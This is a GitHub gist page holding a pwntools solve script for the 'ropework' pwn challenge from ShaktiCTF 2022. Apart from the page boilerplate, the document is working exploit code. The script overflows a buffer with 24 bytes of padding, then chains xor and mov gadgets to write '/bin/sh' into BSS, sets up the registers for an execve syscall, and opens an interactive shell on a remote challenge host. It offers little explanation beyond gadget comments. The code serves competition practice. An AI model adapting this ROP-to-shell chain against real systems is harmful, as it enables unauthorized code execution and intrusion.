Skip to content

Instantly share code, notes, and snippets.

@xct

xct/solve.py Secret

Created December 10, 2022 14:35
Show Gist options
  • Save xct/a2547024ea0922398450c71a44692955 to your computer and use it in GitHub Desktop.
Save xct/a2547024ea0922398450c71a44692955 to your computer and use it in GitHub Desktop.
Ropworks ShaktiCTF 2022
from pwn import *
import binascii
context.terminal = ['alacritty', '-e', 'zsh', '-c']
context.arch = "amd64"
# gdb hack
def _new_binary():
return "gdb-gef"
gdb.binary = _new_binary
p = remote('65.2.136.80',32421, level='debug')
#p = process("./ropework", level="debug")
binary = ELF("ropework")
p.recvuntil("great!")
#gdb.attach(p, '''
#b* 0x401207
#b* system
#continue
#''')
rop = ROP(binary)
rop.raw(rop.find_gadget(['ret'])) # align
rop.raw(0x40126c) #pop r12; pop r13; pop r14; pop r15; ret;
rop.raw(binary.bss(0)+0x80)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0x401196) # xor r10, r10; ret;
rop.raw(0x401192) # xor rdx, rdx; ret;
rop.raw(0x40119a) # xor r10, r12; ret;
rop.raw(0x40117e) # mov rbx, r10; ret;
rop.raw(0x40118e) # xor rdx, rbx; ret;
# State: RDX = BSS
rop.raw(0x40126c) # pop r12; pop r13; pop r14; pop r15; ret;
rop.raw(u64("/bin/sh\0"))
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0x401196) # xor r10, r10; ret;
rop.raw(0x40119a) # xor r10, r12; ret;
rop.raw(0x40119e) # mov qword ptr [rdx], r10; ret;
# State: R10 = /bin/sh\0, written to BSS
rop.raw(rop.find_gadget(['pop rdi','ret']))
rop.raw(binary.bss(0)+0x80)
# RDI -> Ptr to BSS /bin/sh
rop.raw(0x40126c) #pop r12; pop r13; pop r14; pop r15; ret;
rop.raw(0x3b) # execve
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
rop.raw(0x401196) # xor r10, r10; ret;
rop.raw(0x401192) # xor rdx, rdx; ret;
rop.raw(0x40119a) # xor r10, r12; ret;
rop.raw(0x40117e) # mov rbx, r10; ret;
rop.raw(0x401182) # xor rax, rax; ret;
rop.raw(0x401186) # xor rax, rbx; ret;
rop.raw(0x401192) # xor rdx, rdx
rop.raw(0x401271) # pop rsi; pop r15; ret;)
rop.raw(0)
rop.raw(0xdeadbeef)
rop.raw(0x4011a2) # syscall
print(rop.dump())
buf = b""
buf += b"A"*24
buf += rop.chain()
buf += b"Z"*(400-len(buf))
p.sendline(buf)
p.interactive()
p.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment